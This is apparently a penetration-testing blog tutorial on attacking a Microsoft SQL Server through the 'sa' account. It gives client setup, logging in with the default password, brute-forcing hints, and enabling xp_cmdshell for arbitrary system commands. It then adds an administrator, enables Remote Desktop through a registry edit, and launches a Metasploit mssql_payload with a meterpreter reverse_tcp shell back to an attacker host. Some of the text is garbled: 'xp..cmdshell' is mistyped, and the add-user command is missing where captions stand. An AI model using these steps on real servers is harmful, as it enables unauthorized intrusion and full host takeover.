In this article, we’ll cover connecting to a Microsoft SQL (MSSQL) server from the Backtrack/Linux command line, executing system commands through the ‘sa’ or other administrative account, and finally exploiting the ‘sa’ account through metasploit.

To start with, let’s cover a quick HOWTO on getting an MSSQL client working under Backtrack/Linux. We’ll need freetds and sqsh for this:

apt-get install sqsh freetds-bin freetds-common freetds-dev

Once done, we’ll need to edit /etc/freetds/freetds.conf, and append the following to it:

[MyServer]
host = 192.168.1.10
port = 1433
tds version = 8.0

And lastly, we’ll edit ~/.sqshrc:

\set username=sa
\set password=password
\set style=vert


Finally by issuing:

sqsh -S MyServer

If all went well, we should now be waiting at a prompt. First lets see if we can enumerate a list of available databases with:

SELECT name FROM master..sysdatabases
go

Here are the results:

MSSQL Database List

MSSQL Database List

Great, so we’re logged in as the system administrator, ‘sa’ user, and we’ve managed to run a query to enumerate a list of databases. At this point, we can use regular MSSQL syntax to interact with the server and we wish.

Taking a few steps back, by default, the ‘sa’ account has a default password of ‘password’ and on our target system this had not been changed. Assuming the system administrator had set a password, we can use ‘mssql_brute.rc’ from Metasploit or nmap’s ms-sql-brute script to brute force the account password.

Back to the task at hand, now that we have MSSQL sa access, how can this be leveraged to allow for remote code execution? This is where the ‘xp_cmdshell’ feature within MSSQL becomes useful. Prior to SQL Server 2005, xp_cmdshell was enabled by default, however from 2005 onwards, xp_cmdshell was disabled. Assuming that xp_cmdshell is disabled, we first need to enable it as follows:

exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go

We can then use the function to run arbitrary system commands under the context of the SQL Server with:

xp..cmdshell 'dir c:\'
go
Net Add User

Net Add User

We now have a working account within the Administrators group, and can proceed to connect to our newly created account via Remote Desktop. If Remote Desktop is not currently running, it can be enabled with:

xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go

As a second route, we can also exploit the account using Metasploit by using mssql_payload:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.120
msf exploit(mssql_payload) > set RHOST 192.168.1.10
msf exploit(mssql_payload) > set LPORT 8080
msf exploit(mssql_payload) > set PASSWORD password
msf exploit(mssql_payload) > exploit

The command stager will upload whilst the progress printed to the terminal, and finally:

Shell

Shell

Game Over 😉